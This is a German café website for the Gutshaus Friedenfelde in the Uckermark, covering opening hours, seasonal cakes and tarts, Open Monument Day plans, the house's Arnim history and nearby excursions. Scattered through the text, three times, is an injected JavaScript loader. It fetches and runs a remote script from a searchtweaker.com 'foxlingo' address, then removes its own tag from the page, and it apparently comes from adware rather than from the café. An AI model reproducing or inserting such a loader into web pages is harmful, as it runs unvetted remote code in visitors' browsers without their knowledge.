Willkommen
Wir über uns/Philosophie
Unser Café
Friedenfelde
Service und Angebote
Termine/Aktuelles
So finden Sie zu uns
Kontakt, Impressum
Links
 




Sie finden das "Gutshaus Friedenfelde" (mit kleiner Bildergalerie) auch auf Facebook unter:
http://www.facebook.com/pages/Gutshaus-Friedenfelde/242514905785551

Wir haben wie folgt geöffnet:

Donnerstag, Freitag bis Sonntag, Montag und an Feiertagen, jeweils von 13.00 Uhr bis 19.00 Uhr, sowie nach Vereinbarung.
(wir räumen ab ca. 18.30 Uhr unsere Küche auf. Wenn Sie später kommen möchten, bitten wir um rechtzeitige Anmeldung !)
Natürlich öffnen wir auch nach Vereinbarung zu anderen Zeiten.


(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();

Sie möchten einen kleinen Einblick in unsere schöne Uckermark: wir empfehlen Ihnen den folgenden Link zu Youtube : Uckermark.

Nächster Sonntag: Tag des Offenen Denkmals am 14.9. - wir sind natürlich dabei, auch wenn wir mit unserem Gutshaus zum Jahresthema "Farbe" nicht so sehr viel beizutragen haben, denn besonders farbenprächtig gestaltet war dieses ländliche Gutshaus auch zu Zeiten des Achim von Arnim nicht - und welche Farbe seine Seidentapete hatte, ist leider nicht überliefert ..und später  war farblich auch nicht viel drin..mal abgesehen von den als Relikt aus DDR-Zeiten noch existierenden Ölfarbensockeln.
....Dafür gestalten wir unser Angebot an Trinkschokoladen etwas bunter: viele kennen ja unsere Cocaya organic und Cocaya dark Trinkschokolade. Unser neues Angebot erweitert das Genussspektrum noch um einige Potenzen (aus unserer Sicht). Von süß, würzig, scharf bis exotisch erwarten Euch neue Schokoladen-Geschmacksexplosionen ! Auch milchfreie, vegane und glutenfreie Sorten haben wir, dazu die passende Soja-,Hafer-, oder sogar Mandelmilch ! Laßt Euch mal auf ein neues aufhellendes Geschmackserleben ein... auf bald !Die ZOTTER-Schokoladen warten - bio, transfair !

Für Liebhaber des Apfelmostes schon eine Vorankündigung: am 3.Oktober ist Daisy v.Arnim aus Lichtenhain wieder mit ihrer mobilen Mosterei bei uns auf dem Gutshof !
Ein Bild zeigt unser festlich eingedecktes Kaminzimmer - wir hätten es nicht geglaubt, aber es gehen schon die ersten Anfragen für die Adventszeit ein...wer also bei uns feiern will, sollte bald über eine Reservierung nachdenken (zugegeben, jetzt gerade fällt es mir auch eher schwer, an die Weihnachtszeit zu denken..heute strahlender Sonenschein, kurzärmeliges Hemd und 25 °C). Die Jungstörche haben am 19.8. ihren "Abschied" für dieses Jahr genommen. Dafür sind die Kraniche wieder vermehrt zu hören und kreisen teilweise in Scharen über den Feldern.
Wir möchten aus gegebenem Anlaß erneut darauf hinweisen, daß wir unseren Kuchen grundsätzlich nur für den Verzehr in unserem Cafe anbieten!
Wenn Sie für einen privaten Anlaß Kuchen und Torten mitnehmen wollen, sollten diese bitte rechtzeitig vorbestellt werden (mindestens 1 Woche vorher). Wir können dann Ihre Wünsche berücksichtigen und backen jeweils frisch für Sie.

Der ganze Reigen frischer Früchte  steht zur Zeit zur Verfügung - danach richtet sich jetzt auch
Unser Tortenangebot (solange der Vorrat reicht - das Angebot wechselt während des Wochenendes - deshalb gibt es keine Garantie, daß genau die genannten Torten vorrätig sind ! Kuchen/Torten zum Mitnehmen nur mit Vorbestellung ! )
Aktuell gibt es aus unserem Backofen :

Streuselkuchen mit Gartenpfirsichen
Pflaumen-Streuselkuchen
Apfel-Walnuß-Torte mit einem Schuß Calvados
Orangencreme-Holunder-Torte
Herbstkuchen mit Birnen,Pflaumen und Holunderbeeren
Bettina & Achim-Torte mit Stachelbeeren (gluten-und lactosefrei)
u.a.m.

- und wer kein Kuchenfan ist:
Wir haben immer wieder verschiedene Quiches im Angebot.
Dazu stehen auch weitere Speisen, Suppen und Varianten unserer herzhaften Dinkel-Flammkuchen  bereit !

Wer mal in Potsdam leckere Macarons und Torten probieren möchte:
Das Tag des offenen DenkmalsBrahmstaedts - Am Bassin 11 (an der Peter-und Paul-Kirche) ist unsere Empfehlung. Da gibt es köstliche Macarons aus hauseigener Manufaktur, Kaffee, Kuchen und manches mehr. Ein Besuch lohnt sich !

Die Uckermark ist "Nachhaltige Tourismusregion" Der Wettbewerb prämiert Tourismusregionen, die ihre Tourismusangebote im Sinne der nachhaltigen Entwicklung gestalten. Das ist ein toller Erfolg für die Uckermark! Derzeit wird ein touristisches Leitbild zu diesem Thema erarbeitet !(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();

Das Gutshaus Friedenfelde bezieht Ökostrom über "Naturstrom" ! Infos zu unserem  Stromlieferanten: http://www.naturstrom.de

Wir bieten Ihnen über den Anbieter "The Cloud" auch kostenloses WLAN/Wifi in unserem Gästebereich an. (Registrierung erforderlich/60 min kostenlos)

letzte Aktualisierung: 13.September 2014 , 23.00 Uhr
****************** Willkommen in Friedenfelde*********************

Wir können noch keine Gästezimmer im Gutshaus anbieten! In der Region Gerswalde gibt es jedoch gute Übernachtungsmöglichkeiten - wir informieren Sie gerne !


(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();

Erfahren Sie dort, wo einst die Familie von Arnim lebte , Geschichte und Geschichten , Natur und Kunst aus diesem Stein-reichen, vielfältigen Landstrich der Uckermark im Norden des Biosphärenreservates Schorfheide/Chorin. Machen Sie einen Ausflug zu uns, genießen Sie natürlich, genußvoll und streßfrei im renovierten Salon oder im Garten : Tee, Kaffee , selbstgebackenen Vollkornkuchen, eine kleine Auswahl von vegetarischen Gerichten, leckere Eisspezialitäten und regionale Produkte:
Wir bieten Ihnen auch glutenfreie/lactosefreie Gerichte, Getränke und Kuchen an. Wir können auch auf spezifische Lebensmittelunverträglichkeiten Rücksicht nehmen ! Bitte sprechen Sie vor der Bestellung mit uns!
In unserer täglichen Speisekarte (bis ca.18.30 Uhr-dann wird die Küche aufgeräumt, bei Vorbestellung jedoch gerne auch später) bieten wir Ihnen unseren leckeren Dinkel-Flammkuchen (eigene Herstellung!) in vielen Belagsvarianten. Unsere Pflaumen-Quark-Knödel sind ebenso beliebt, wie die kleine Auswahl an Suppen.
Natürlich gibt es immer unsere selbstgebackenen Kuchen und Torten !
Vegetarische Gerichte sind zwar unser Schwerpunkt, dennoch können wir Ihnen auf Vorbestellung gerne auch Wildragout oder andere Fleischgerichte anbieten.


MohnfeldIch kann sprechen mit der Natur,
wenn ich allein mit ihr bin,
aber es darf niemand hinter mir sein,
denn grad das Alleinsein macht,
daß ich mit ihr bin.

Bettina von Arnim


Der Mensch ist bald vergessen,
der Mensch vergißt so bald,
der Mensch hat nichts besessen,
er sterb jung oder alt.
Der Mensch ist bald vergessen,
nur Gott vergißt uns nicht,
hat unser Herz ermessen,
wenn es in Schwachheit bricht.

Achim von Arnim

Seit Mai 2001 betreiben wir - die Familie Nowatzki - ein kleines Cafe im renovierten ehemaligen Salon des Gutshauses Friedenfelde. Wir haben uns dabei auf selbstgebackenen Vollkornkuchen, Dinkelflammkuchen und vegetarische Gerichte spezialisiert, bieten inzwischen aber auch Alternativen für Fleischliebhaber. Dafür verwenden wir überwiegend Produkte und Rohstoffe aus unserer Region.
Auf Bestellung können Sie bei uns vegetarische Vollkornbuffets oder auch Menüs für mehrere Personen genießen.
In der näheren und weiteren Umgebung des Hauses bieten sich vielfältige Wandermöglichkeiten.
Lassen Sie Ihre Seele im Park des Gutshauses baumeln oder kühlen Sie sich mit einem Bad im nahen, klaren Stiernsee . Oder lassen Sie sich vom Hausherrn - wenn er Zeit hat - durch das alte, noch in Renovierung befindliche Gutshaus führen und lauschen Sie den Geschichten und dem Klang eines alten uckermärkischen Herrensitzes.
Im Winter können Sie sich an unseren Café-Kachelöfen wärmen und winterliche Spezialitäten wie Glühwein und frische Bratäpfel genießen. Lassen Sie sich vom Äußeren des Hauses nicht abschrecken - es ist noch viel daran zu bauen (das sagte schon Achim von Arnim über dieses Haus im Jahre 1809 - daran können Sie in etwa den Renovierungsrückstand abmessen). Der Putz und das Dach lassen noch zu wünschen übrig, was die Optik angeht - die Funktion des Hauses ist davon nicht beeinträchtigt und Innen haben wir doch schon viel geschafft. Aber immer ein Schritt nach dem anderen...

Wir wurden am 16.11.2010 erstmals mit dem Siegel "Brandenburger Gastlichkeit" ausgezeichnet wurden. Wir sind natürlich sehr stolz über diese Auszeichnung, die unser Streben nach Service und Qualität unterstreicht.

Auch den erneuten Test für 2013/2014 haben wir bestanden.

Buntes Treiben auf dem Gutshof - immmer wieder mal laden wir ein zu Veranstaltungen im und um das Gutshaus.
Zum Beispiel zum Tag des offenen Denkmals im September, zum Apfelmosten, zum Tag der offenen Gärten, zu Lesungen oder Theatervorstellungen unter freiem Himmel .

Bitte informieren Sie sich aktuell zu unseren Terminen.

Weitere Ausflugstipps : Besuchen Sie z.B. den Straußenhof Berkenlatten oder die Lehrschäferei der Fam.Kath in Friedrichsfelde. Nutzen Sie die Gelegenheit, nebenbei auch die Künstlerateliers in unserer Umgebung und in Friedenfelde zu besichtigen : Karla Gänßler, Frau Hoppe, Hans-Otto Schmidt, Klaus Schitthelm, Sylvia Juhl und in Klein Fredenwalde : Hartmut Henschel.

 
Top